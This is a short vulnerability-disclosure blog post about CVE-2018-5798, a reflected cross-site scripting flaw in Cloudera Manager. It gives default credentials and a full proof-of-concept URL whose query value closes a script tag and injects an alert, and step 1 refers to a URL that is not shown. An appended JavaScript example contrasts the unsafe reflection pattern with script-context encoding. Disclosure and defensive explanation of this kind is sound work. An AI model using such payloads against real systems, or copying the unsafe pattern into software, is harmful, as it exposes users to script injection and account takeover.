Mar 23 2025

CVE-2018-5798 – Cross-site scripting vulnerability in Cloudera Manager – Part 2


Author: Shafeeque Olassery Kunnikkal | Category: Cross Site Scripting, CVE-2018-5798, Cyber Security

Below are the details of the reflected XSS I found in Cloudera Enterprise. More details can be found here: https://www.cloudera.com/documentation/other/securitybulletins/topics/Security-Bulletin.html#DOCS-3186

Log in to Cloudera Manager using the credentials admin:admin

1. Navigate to the following URL, which includes the XSS payload.

You will see the XSS payload executed, as shown in the image below.

[Image: xss]

2. After logging in to Cloudera Manager (credentials: admin:admin), navigate to the following URL in the browser:

http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E

You will see the XSS payload executed, as shown in the image below.

[Image: XSS]
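As an added example (not code from this post or from Cloudera Manager), the Node.js snippet below pulls the `q` value out of the nested `metadataUrl` parameter of the step 2 URL, shows why reflecting that value verbatim inside a `<script>` block lets the embedded `</script>` terminate the block, and shows the script-context encoding that prevents it. The helper names are hypothetical.

```javascript
// Added example, not from the post or from Cloudera Manager. Helper names are
// hypothetical; the sample URL is the one quoted in step 2 of the post.
const SAMPLE_URL =
  "http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E";

// Pull the inner `q` parameter out of the URL-encoded metadataUrl parameter.
// Returns null when either parameter is absent.
function extractQ(pageUrl) {
  const outer = new URL(pageUrl);
  const metadataUrl = outer.searchParams.get("metadataUrl");
  if (metadataUrl === null) return null;
  return new URL(metadataUrl, outer.origin).searchParams.get("q");
}

// Vulnerable pattern: the reflected value is dropped into a <script> block as-is.
// The HTML parser finds the "</script>" inside the string first, closes the block,
// and parses whatever follows as fresh markup.
function renderUnsafe(q) {
  return `<script>var query = "${q}";</script>`;
}

// Hardened pattern: JSON-serialise the value and escape "<" and ">" as JavaScript
// unicode escapes, so the HTML parser can never see a tag boundary inside the literal
// while the script still receives the original characters.
function encodeForScriptContext(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e");
}

function renderSafe(q) {
  return `<script>var query = ${encodeForScriptContext(q)};</script>`;
}

// Check: more than one closing script tag in the rendered fragment means the
// reflected value broke out of the script block.
function breaksOutOfScript(html) {
  return (html.match(/<\/script\s*>/gi) || []).length > 1;
}
```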
